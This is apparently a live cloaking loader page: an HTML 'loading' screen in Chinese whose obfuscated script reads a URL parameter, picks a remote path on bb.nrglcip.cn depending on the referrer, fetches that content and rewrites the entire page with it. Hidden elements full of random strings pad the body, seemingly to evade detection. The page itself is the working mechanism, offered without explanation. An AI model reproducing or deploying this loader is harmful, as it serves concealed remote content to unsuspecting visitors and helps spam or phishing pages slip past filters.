<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oMCCtrq58 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oMCCtrq58 .zxWfUn {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oMCCtrq58 .content {
            line-height: 50px;
            text-align: center
        }

        .oMCCtrq58 .img {
            width: 100%
        }

        .oMCCtrq58 .sKDnBH {
            text-align: center
        }

        .oMCCtrq58 .sKDnBH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oMCCtrq58 .sKDnBH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oMCCtrq58 .sKDnBH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oMCCtrq58 .sKDnBH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oMCCtrq58 .sKDnBH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oMCCtrq58 .sKDnBH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oMCCtrq58 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OoZktJFQnz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wEOuR3 = OoZktJFQnz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wEOuR3 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wEOuR3 +".html?a=share";
		}
		
        hm8PsD7=url+"#"+new Date().getTime();
        hm8PsD7 && function() {
            $.get(hm8PsD7, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Fky18mHpoFaovkllvvNXv0HupGRw61QV3agvqupsU</b>
<img  src='' style='display:none'>
<h1 style='display:none' >E8Tp674Di5Dz</h1>
<b style='display:none' >Fky18mHpoFaovkllvvNXv0HupGRw61QV3agvqupsU</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>DhxgmTkyU6jER7ugzvO5lx19nKxCFIFRtjP</a>
<ul style='display:none' >MHT4TuwYQdHvQcXLNJjypvBBBcdqRxsXIaEzWvbHKz9VgkKZE5oqx9rj8r7d1IbJoaT</ul>
<div style='display:none'>rrfyaGZzFmalH4OuV3tX7aFmJ3eNxFbNpBzg8hkrCQKDQj</div>
<ul style='display:none' >MHT4TuwYQdHvQcXLNJjypvBBBcdqRxsXIaEzWvbHKz9VgkKZE5oqx9rj8r7d1IbJoaT</ul><div class="oMCCtrq58">
    <div class="zxWfUn">
        <div class="sKDnBH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >ALLOWHHm6AKgkw</ul>
<b style='display:none' >rYrh3jEts3KEeRp3Bf2oVeYHmG1oajpIxkwG4WNC7RJj1kpyr8Bm07OoNrq</b>
<img  src='' style='display:none'></body>
</html>